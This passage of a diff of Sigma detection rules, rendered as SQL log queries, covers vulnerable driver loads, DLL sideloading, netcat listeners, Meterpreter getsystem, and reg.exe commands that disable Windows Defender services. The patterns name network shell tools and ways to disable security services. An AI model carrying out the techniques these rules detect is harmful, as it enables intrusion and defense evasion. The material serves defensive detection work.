'%SHA256=0440ef40c46fdd2b5d86e7feef8577a8591de862cfd7928cdbcc8f47b8fa3ffc%' ESCAPE '\\' OR Hashes LIKE '%SHA256=9b1b15a3aacb0e786a608726c3abfc94968915cedcbd239ddf903c4a54bfcf0c%' ESCAPE '\\' OR Hashes LIKE '%SHA256=8e035beb02a411f8a9e92d4cf184ad34f52bbd0a81a50c222cdd4706e4e45104%' ESCAPE '\\' OR Hashes LIKE '%SHA256=d7c81b0f3c14844f6424e8bdd31a128e773cb96cccef6d05cbff473f0ccb9f9c%' ESCAPE '\\' OR Hashes LIKE '%SHA256=05b146a48a69dd62a02759487e769bd30d39f16374bc76c86453b4ae59e7ffa4%' ESCAPE '\\' OR Hashes LIKE '%SHA256=c8f9e1ad7b8cce62fba349a00bc168c849d42cfb2ca5b2c6cc4b51d054e0c497%' ESCAPE '\\' OR Hashes LIKE '%SHA1=31cc8718894d6e6ce8c132f68b8caaba39b5ba7a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=a804ebec7e341b4d98d9e94f6e4860a55ea1638d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6debce728bcff73d9d1d334df0c6b1c3735e295c%' ESCAPE '\\' OR Hashes LIKE '%SHA1=cc65bf60600b64feece5575f21ab89e03a728332%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3ef30c95e40a854cc4ded94fc503d0c3dc3e620e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=b2f955b3e6107f831ebe67997f8586d4fe9f3e98%' ESCAPE '\\' OR Hashes LIKE '%MD5=10f3679384a03cb487bda9621ceb5f90%' ESCAPE '\\' OR Hashes LIKE '%MD5=04a88f5974caa621cee18f34300fc08a%' ESCAPE '\\' OR Hashes LIKE '%MD5=6fcf56f6ca3210ec397e55f727353c4a%' ESCAPE '\\' OR Hashes LIKE '%MD5=0f16a43f7989034641fd2de3eb268bf1%' ESCAPE '\\' OR Hashes LIKE '%MD5=ee6b1a79cb6641aa44c762ee90786fe0%' ESCAPE '\\' OR Hashes LIKE '%MD5=909f3fc221acbe999483c87d9ead024a%' ESCAPE '\\') OR sha256 IN ('0440ef40c46fdd2b5d86e7feef8577a8591de862cfd7928cdbcc8f47b8fa3ffc', '9b1b15a3aacb0e786a608726c3abfc94968915cedcbd239ddf903c4a54bfcf0c', '8e035beb02a411f8a9e92d4cf184ad34f52bbd0a81a50c222cdd4706e4e45104', 'd7c81b0f3c14844f6424e8bdd31a128e773cb96cccef6d05cbff473f0ccb9f9c', '05b146a48a69dd62a02759487e769bd30d39f16374bc76c86453b4ae59e7ffa4', 'c8f9e1ad7b8cce62fba349a00bc168c849d42cfb2ca5b2c6cc4b51d054e0c497') OR sha1 IN ('31cc8718894d6e6ce8c132f68b8caaba39b5ba7a', 'a804ebec7e341b4d98d9e94f6e4860a55ea1638d', '6debce728bcff73d9d1d334df0c6b1c3735e295c', 'cc65bf60600b64feece5575f21ab89e03a728332', '3ef30c95e40a854cc4ded94fc503d0c3dc3e620e', 'b2f955b3e6107f831ebe67997f8586d4fe9f3e98') OR md5 IN ('10f3679384a03cb487bda9621ceb5f90', '04a88f5974caa621cee18f34300fc08a', '6fcf56f6ca3210ec397e55f727353c4a', '0f16a43f7989034641fd2de3eb268bf1', 'ee6b1a79cb6641aa44c762ee90786fe0', '909f3fc221acbe999483c87d9ead024a'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\nc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ncat.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netcat.exe' ESCAPE '\\') OR (CommandLine LIKE '% -lvp %' ESCAPE '\\' OR CommandLine LIKE '% -lvnp%' ESCAPE '\\' OR CommandLine LIKE '% -l -v -p %' ESCAPE '\\' OR CommandLine LIKE '% -lv -p %' ESCAPE '\\' OR CommandLine LIKE '% -l --proxy-type http %' ESCAPE '\\' OR CommandLine LIKE '% -vnl --exec %' ESCAPE '\\' OR CommandLine LIKE '% -vnl -e %' ESCAPE '\\' OR CommandLine LIKE '% --lua-exec %' ESCAPE '\\' OR CommandLine LIKE '% --sh-exec %' ESCAPE '\\')))" ], - "filename": "driver_load_win_mal_poortry_driver.yml" + "filename": "proc_creation_win_pua_netcat.yml" }, { - "title": "Vulnerable GIGABYTE Driver Load", - "id": "7bcfeece-e5ed-4ff3-a5fb-2640d8cc8647", + "title": "Potential Suspicious Activity Using SeCEdit", + "id": "c2c76b77-32be-4d1f-82c9-7e544bdfe0eb", "status": "experimental", - "description": "Detects the load of a signed and vulnerable GIGABYTE driver often used by threat actors or malware for privilege escalation", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects potential suspicious behaviour using secedit.exe. Such as exporting or modifying the security policy", + "author": "Janantha Marasinghe", "tags": [ + "attack.discovery", + "attack.persistence", + "attack.defense_evasion", + "attack.credential_access", "attack.privilege_escalation", - "attack.t1543.003" + "attack.t1562.002", + "attack.t1547.001", + "attack.t1505.005", + "attack.t1556.002", + "attack.t1562", + "attack.t1574.007", + "attack.t1564.002", + "attack.t1546.008", + "attack.t1546.007", + "attack.t1547.014", + "attack.t1547.010", + "attack.t1547.002", + "attack.t1557", + "attack.t1082" ], "falsepositives": [ - "Unknown" + "Legitimate administrative use" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((Hashes LIKE '%MD5=9AB9F3B75A2EB87FAFB1B7361BE9DFB3%' ESCAPE '\\' OR Hashes LIKE '%MD5=C832A4313FF082258240B61B88EFA025%' ESCAPE '\\' OR Hashes LIKE '%SHA1=FE10018AF723986DB50701C8532DF5ED98B17C39%' ESCAPE '\\' OR Hashes LIKE '%SHA1=1F1CE28C10453ACBC9D3844B4604C59C0AB0AD46%' ESCAPE '\\' OR Hashes LIKE '%SHA256=31F4CFB4C71DA44120752721103A16512444C13C2AC2D857A7E6F13CB679B427%' ESCAPE '\\' OR Hashes LIKE '%SHA256=CFC5C585DD4E592DD1A08887DED28B92D9A5820587B6F4F8FA4F56D60289259B%' ESCAPE '\\') OR md5 IN ('9ab9f3b75a2eb87fafb1b7361be9dfb3', 'c832a4313ff082258240b61b88efa025') OR sha1 IN ('fe10018af723986db50701c8532df5ed98b17c39', '1f1ce28c10453acbc9d3844b4604c59c0ab0ad46') OR sha256 IN ('31f4cfb4c71da44120752721103a16512444c13c2ac2d857a7e6f13cb679b427', 'cfc5c585dd4e592dd1a08887ded28b92d9a5820587b6f4f8fa4f56d60289259b'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\secedit.exe' ESCAPE '\\' OR OriginalFileName = 'SeCEdit') AND ((CommandLine LIKE '%/export%' ESCAPE '\\' AND CommandLine LIKE '%/cfg%' ESCAPE '\\') OR (CommandLine LIKE '%/configure%' ESCAPE '\\' AND CommandLine LIKE '%/db%' ESCAPE '\\')))" ], - "filename": "driver_load_win_vuln_gigabyte_driver.yml" + "filename": "proc_creation_win_secedit_execution.yml" }, { - "title": "Suspicious Driver Load from Temp", - "id": "2c4523d5-d481-4ed0-8ec3-7fbf0cb41a75", + "title": "Potential Meterpreter/CobaltStrike Activity", + "id": "15619216-e993-4721-b590-4c520615a67d", "status": "test", - "description": "Detects a driver load from a temporary directory", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service starting", + "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", "tags": [ - "attack.persistence", "attack.privilege_escalation", - "attack.t1543.003" + "attack.t1134.001", + "attack.t1134.002" ], "falsepositives": [ - "There is a relevant set of false positives depending on applications in the environment" + "Commandlines containing components like cmd accidentally", + "Jobs and services started with cmd" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ImageLoaded LIKE '%\\\\Temp\\\\%' ESCAPE '\\'" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\' AND ((CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%echo%' ESCAPE '\\' AND CommandLine LIKE '%\\\\pipe\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%cmd%' ESCAPE '\\' OR CommandLine LIKE '%\\%COMSPEC\\%%' ESCAPE '\\')) OR (CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%.dll,a%' ESCAPE '\\' AND CommandLine LIKE '%/p:%' ESCAPE '\\'))) AND NOT ((CommandLine LIKE '%MpCmdRun%' ESCAPE '\\')))" ], - "filename": "driver_load_win_susp_temp_use.yml" + "filename": "proc_creation_win_hktl_meterpreter_getsystem.yml" }, { - "title": "Vulnerable HW Driver Load", - "id": "9bacc538-d1b9-4d42-862e-469eafc05a41", + "title": "Suspicious Subsystem for Linux Bash Execution", + "id": "5edc2273-c26f-406c-83f3-f4d948e740dd", "status": "experimental", - "description": "Detects the load of a legitimate signed driver named HW.sys by often used by threat actors or malware for privilege escalation", - "author": "Florian Roth (Nextron Systems)", + "description": "Performs execution of specified file, can be used for defensive evasion.", + "author": "frack113", "tags": [ - "attack.privilege_escalation", - "attack.t1543.003" + "attack.defense_evasion", + "attack.t1202" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\HW.sys' ESCAPE '\\' OR (Hashes LIKE '%SHA256=4880F40F2E557CFF38100620B9AA1A3A753CB693AF16CD3D95841583EDCB57A8%' ESCAPE '\\' OR Hashes LIKE '%SHA256=55963284BBD5A3297F39F12F0D8A01ED99FE59D008561E3537BCD4DB4B4268FA%' ESCAPE '\\' OR Hashes LIKE '%SHA256=6A4875AE86131A594019DEC4ABD46AC6BA47E57A88287B814D07D929858FE3E5%' ESCAPE '\\' OR Hashes LIKE '%SHA1=74E4E3006B644392F5FCEA4A9BAE1D9D84714B57%' ESCAPE '\\' OR Hashes LIKE '%SHA1=18F34A0005E82A9A1556BA40B997B0EAE554D5FD%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4E56E0B1D12664C05615C69697A2F5C5D893058A%' ESCAPE '\\' OR Hashes LIKE '%MD5=3247014BA35D406475311A2EAB0C4657%' ESCAPE '\\' OR Hashes LIKE '%MD5=376B1E8957227A3639EC1482900D9B97%' ESCAPE '\\' OR Hashes LIKE '%MD5=45C2D133D41D2732F3653ED615A745C8%' ESCAPE '\\') OR sha256 IN ('4880f40f2e557cff38100620b9aa1a3a753cb693af16cd3d95841583edcb57a8', '55963284bbd5a3297f39f12f0d8a01ed99fe59d008561e3537bcd4db4b4268fa', '6a4875ae86131a594019dec4abd46ac6ba47e57a88287b814d07d929858fe3e5') OR sha1 IN ('74e4e3006b644392f5fcea4a9bae1d9d84714b57', '18f34a0005e82a9a1556ba40b997b0eae554d5fd', '4e56e0b1d12664c05615c69697a2f5c5d893058a') OR md5 IN ('3247014ba35d406475311a2eab0c4657', '376b1e8957227a3639ec1482900d9b97', '45c2d133d41d2732f3653ed615a745c8'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%bash.exe%' ESCAPE '\\' AND CommandLine LIKE '%-c %' ESCAPE '\\') AND NOT (((ParentCommandLine LIKE '%C:\\\\Program Files\\\\Git\\\\post-install.bat%' ESCAPE '\\' OR ParentCommandLine LIKE '%C:\\\\Program Files (x86)\\\\Git\\\\post-install.bat%' ESCAPE '\\' OR ParentCommandLine LIKE '%echo /etc/post-install/%.post%' ESCAPE '\\') OR CommandLine LIKE '%echo /etc/post-install/%.post%' ESCAPE '\\')))" ], - "filename": "driver_load_win_vuln_hw_driver.yml" + "filename": "proc_creation_win_lolbin_bash.yml" }, { - "title": "DLL Sideloading Of DBGHELP.DLL", - "id": "6414b5cd-b19d-447e-bb5e-9f03940b5784", + "title": "Reg Disable Security Service", + "id": "5e95028c-5229-4214-afae-d653d573d0ec", "status": "experimental", - "description": "Detects DLL sideloading of \"dbghelp.dll\"", - "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", + "description": "Detects a suspicious reg.exe invocation that looks as if it would disable an important security service", + "author": "Florian Roth (Nextron Systems), John Lambert (idea), elhoim", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1562.001" ], "falsepositives": [ - "Legitimate applications loading their own versions of the DLL mentioned in this rule" + "Unknown", + "Other security solution installers" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' AND NOT (((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SystemTemp\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\') OR (ImageLoaded LIKE '%\\\\Epic Games\\\\Launcher\\\\Engine\\\\Binaries\\\\ThirdParty\\\\DbgHelp\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Epic Games\\\\MagicLegends\\\\x86\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Anaconda3\\\\Lib\\\\site-packages\\\\vtrace\\\\platforms\\\\windll\\\\amd64\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Anaconda3\\\\Lib\\\\site-packages\\\\vtrace\\\\platforms\\\\windll\\\\i386\\\\dbghelp.dll' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\') AND ((CommandLine LIKE '% /d 4%' ESCAPE '\\' AND CommandLine LIKE '% /v Start%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Sense%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WinDefend%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsMpSvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\NisSrv%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdBoot%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdNisDrv%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdNisSvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\wscsvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SecurityHealthService%' ESCAPE '\\' OR CommandLine LIKE '%\\\\wuauserv%' ESCAPE '\\' OR CommandLine LIKE '%\\\\UsoSvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdFilter%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppIDSvc%' ESCAPE '\\')) OR (CommandLine LIKE '% /d 1%' ESCAPE '\\' AND CommandLine LIKE '%Windows Defender%' ESCAPE '\\' AND (CommandLine LIKE '%DisableIOAVProtection%' ESCAPE '\\' OR CommandLine LIKE '%DisableOnAccessProtection%' ESCAPE '\\' OR CommandLine LIKE '%DisableRoutinelyTakingAction%' ESCAPE '\\' OR CommandLine LIKE '%DisableScanOnRealtimeEnable%' ESCAPE '\\' OR CommandLine LIKE '%DisableBlockAtFirstSeen%' ESCAPE '\\' OR CommandLine LIKE '%DisableBehaviorMonitoring%' ESCAPE '\\' OR CommandLine LIKE '%DisableEnhancedNotifications%' ESCAPE '\\' OR CommandLine LIKE '%DisableAntiSpyware%' ESCAPE '\\' OR CommandLine LIKE '%DisableAntiSpywareRealtimeProtection%' ESCAPE '\\' OR CommandLine LIKE '%DisableConfig%' ESCAPE '\\' OR CommandLine LIKE '%DisablePrivacyMode%' ESCAPE '\\' OR CommandLine LIKE '%SignatureDisableUpdateOnStartupWithoutEngine%' ESCAPE '\\' OR CommandLine LIKE '%DisableArchiveScanning%' ESCAPE '\\' OR CommandLine LIKE '%DisableIntrusionPreventionSystem%' ESCAPE '\\' OR CommandLine LIKE '%DisableScriptScanning%' ESCAPE '\\'))))" ], - "filename": "image_load_side_load_dbghelp_dll.yml" + "filename": "proc_creation_win_reg_disable_sec_services.yml" }, { - "title": "Potential System DLL Sideloading From Non System Locations", - "id": "4fc0deee-0057-4998-ab31-d24e46e0aba4", - "status": "experimental", - "description": "Detects DLL sideloading of DLLs usually located in system locations (System32, SysWOW64...)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Detection of PowerShell Execution via Sqlps.exe", + "id": "0152550d-3a26-4efd-9f0e-54a0b28ae2f3", + "status": "test", + "description": "This rule detects execution of a PowerShell code through the sqlps.exe utility, which is included in the standard set of utilities supplied with the MSSQL Server.\nScript blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.\n", + "author": "Agro (@agro_sev) oscd.community", "tags": [ + "attack.execution", + "attack.t1059.001", "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1127" ], "falsepositives": [ - "Legitimate applications loading their own versions of the DLLs mentioned in this rule" + "Direct PS command execution through SQLPS.exe is uncommon, childprocess sqlps.exe spawned by sqlagent.exe is a legitimate action." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\shfolder.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\activeds.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\adsldpc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\aepic.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\apphelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\applicationframe.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appxalluserstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appxdeploymentclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\archiveint.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\atl.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\audioses.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\auditpolcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\authfwcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\authz.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\avrt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcd.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcp47langs.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcp47mrm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcrypt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cabinet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cabview.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\certenroll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cldapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\clipc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\clusapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cmpbk32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coloradapterclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\colorui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\comdlg32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\connect.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coremessaging.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\credui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptdll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptxml.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cscapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cscobj.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cscui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d2d1.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10\\_1.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10\\_1core.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10core.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10warp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d11.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d12.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d9.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dataexchange.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\davclnt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dcomp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\defragproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\desktopshellext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\deviceassociation.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devicecredential.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devicepairing.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devobj.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devrtl.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dhcpcmonitor.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dhcpcsvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dhcpcsvc6.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\directmanipulation.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dismapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dismcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmcfgutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmcmnutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmenrollengine.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmenterprisediagnostics.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmiso8601utils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmoleaututils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmprocessxmlfiltered.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmpushproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmxmlhelputils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dnsapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dot3api.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dot3cfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\drprov.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsparse.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsreg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsrole.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dui70.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\duser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dusmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dwmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dwrite.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxgi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxva2.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\eappcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\eappprxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\edputil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\efsadu.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\efsutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\esent.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\execmodelproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\explorerframe.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fastprox.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\faultrep.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fddevquery.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\feclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fhcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\firewallapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\flightsettings.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fltlib.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fveapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwpolicyiomgr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwpuclnt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\getuname.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hid.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hnetmon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\httpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\idstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ieadvpack.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iedkcs32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iertutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ifmon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iphlpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iri.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iscsidsc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iscsium.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\isv.exe\\_rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\joinutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ksuser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ktmw32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\licensemanagerapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\licensingdiagspp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\linkinfo.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\loadperf.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\logoncli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\logoncontroller.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lpksetupproxyserv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\magnification.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mapistub.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mfcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mfplat.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\midimap.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\miutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mlang.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mmdevapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mobilenetworking.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mpr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mprapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mrmcorer.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msacm32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscms.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscoree.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msctf.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msctfmonitor.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msdrm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msftedit.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msutb.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mswb7.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mswsock.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msxml3.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mtxclu.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\napinsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ncrypt.dll' ESCAPE '\\' OR 